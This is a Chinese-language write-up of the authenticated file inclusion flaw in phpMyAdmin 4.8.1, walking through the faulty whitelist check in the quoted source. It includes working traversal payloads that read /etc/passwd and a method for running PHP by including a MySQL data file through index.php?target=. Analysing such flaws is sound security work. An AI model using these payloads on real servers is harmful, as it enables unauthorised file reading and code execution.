phpmyadmin 4.8.1任意文件包含
0x00 phpmyadmin簡述
phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在於由於phpMyAdmin跟其他PHP程式一樣在網頁服務器上執行,但是您可以在任何地方使用這些程式產生的HTML頁面,也就是於遠端管理MySQL數據庫,方便的建立、修改、刪除數據庫及資料表。也可借由phpMyAdmin建立常用的php語法,方便編寫網頁時所需要的sql語法正確性。
0x01 影響版本
phpmyadmin 4.8.1
之前的版本沒有測試
註:需要登錄phpmyadmin才可利用
0x02漏洞分析
查看index.php 55~63行代碼
if (! empty($_REQUEST[‘target‘]) && is_string($_REQUEST[‘target‘]) && ! preg_match(‘/^index/‘, $_REQUEST[‘target‘]) && ! in_array($_REQUEST[‘target‘], $target_blacklist) && Core::checkPageValidity($_REQUEST[‘target‘]) ) { include $_REQUEST[‘target‘]; exit; }
條件為真(條件):
- $_REQUEST[‘target‘] 不能為空
- $_REQUEST[‘target‘] 是字符串
- $_REQUEST[‘target‘] 不能以index開頭
- $_REQUEST[‘target‘] 不能在$target_blacklist;而$target_blacklist = array (‘import.php‘, ‘export.php‘);
- 需要滿足Core::checkPageValidity($_REQUEST[‘target‘])
Core::checkPageValidity($_REQUEST[‘target‘]),查看phpMyAdmin1\libraries\classes\core.php
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . ‘?‘, ‘?‘)
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . ‘?‘, ‘?‘)
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
出現問題的代碼:
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . ‘?‘, ‘?‘)
);
if (in_array($_page, $whitelist)) {
return true;
}在請求的鏈接中包含%253即可繞過,那可以構造的鏈接有:
db_sql.php%253/../../../../../../etc/passwd
db_sql.php可以替換成一下:
‘db_datadict.php‘,
‘db_sql.php‘,
‘db_events.php‘,
‘db_export.php‘,
‘db_importdocsql.php‘,
‘db_multi_table_query.php‘,
‘db_structure.php‘,
‘db_import.php‘,
‘db_operations.php‘,
‘db_search.php‘,
‘db_routines.php‘,
‘export.php‘,
‘import.php‘,
‘index.php‘,
‘pdf_pages.php‘,
‘pdf_schema.php‘,
‘server_binlog.php‘,
‘server_collations.php‘,
‘server_databases.php‘,
‘server_engines.php‘,
‘server_export.php‘,
‘server_import.php‘,
‘server_privileges.php‘,
‘server_sql.php‘,
‘server_status.php‘,
‘server_status_advisor.php‘,
‘server_status_monitor.php‘,
‘server_status_queries.php‘,
‘server_status_variables.php‘,
‘server_variables.php‘,
‘sql.php‘,
‘tbl_addfield.php‘,
‘tbl_change.php‘,
‘tbl_create.php‘,
‘tbl_import.php‘,
‘tbl_indexes.php‘,
‘tbl_sql.php‘,
‘tbl_export.php‘,
‘tbl_operations.php‘,
‘tbl_structure.php‘,
‘tbl_relation.php‘,
‘tbl_replace.php‘,
‘tbl_row_action.php‘,
‘tbl_select.php‘,
‘tbl_zoom_select.php‘,
‘transformation_overview.php‘,
‘transformation_wrapper.php‘,
‘user_password.php‘,
0x03通過文件包含獲取webshell
前提條件首先知道數據庫的路徑
查看當前數據庫的路徑:
show variables like ‘datadir‘
我新建了一個數據庫 tt,在tt數據庫中添加一個了表,在表中插入了<?php phpinfo()?>
然後訪問:http://localhost/phpMyAdmin1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/tet/tt.MYD
0x04參考鏈接
https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
phpmyadmin 4.8.1任意文件包含